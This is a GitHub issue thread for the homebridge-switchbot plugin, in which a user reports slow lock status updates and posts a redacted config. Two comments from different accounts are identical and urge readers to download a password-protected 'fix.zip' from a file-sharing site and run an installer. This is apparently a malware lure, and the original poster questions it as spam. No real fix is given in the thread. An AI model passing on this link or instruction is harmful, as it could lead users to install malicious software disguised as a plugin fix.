### ISSUE TITLE
Support Request: How to increase the speed of the lock opening and closing status?

### ISSUE THREAD

**Issue by Sergbmw** [OpenWonderLabs/homebridge-switchbot#1034]
### Describe Your Problem

Response time up to 1 minute

### Config for homebridge-switchbot

```shell
{
    "name": "SwitchBot",
    "credentials": {
        "token": "XXX",
        "secret": "XXX",
        "notice": "Keep your Token & Secret a secret!"
    },
    "options": {
        "devices": [
            {
                "deviceId": "XXXX",
                "configDeviceName": "Lock1",
                "configDeviceType": "Smart Lock",
                "connectionType": "OpenAPI",
                "lock": {
                    "hide_contactsensor": true,
                    "activate_latchbutton": false
                },
                "firmware": "7.0",
                "logging": "debug"
            }
        ],
        "BLE": false
    },
    "_bridge": {
        "username": "XXXX",
        "port": 40471
    },
    "platform": "SwitchBot"
}
```

### Device & Model

Smart Lock

### Node.js Version

v20.17.0

### NPM Version

10.8.2

### Homebridge Version

v1.8.4

### Homebridge SwitchBot Plugin Version

v3.7.1-beta.11

### Homebridge Config UI X Plugin Version

v4.57.1

### Operating System

Docker

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Sergbmw** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

??? Spam???

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Sergbmw** [comment]
and status***

**Comment by donavanbecker** [comment]
@Sergbmw this is a cloud based api.

**Comment by bwt615** [comment]
What was the answer to this?

**Comment by Sergbmw** [comment]
no answer
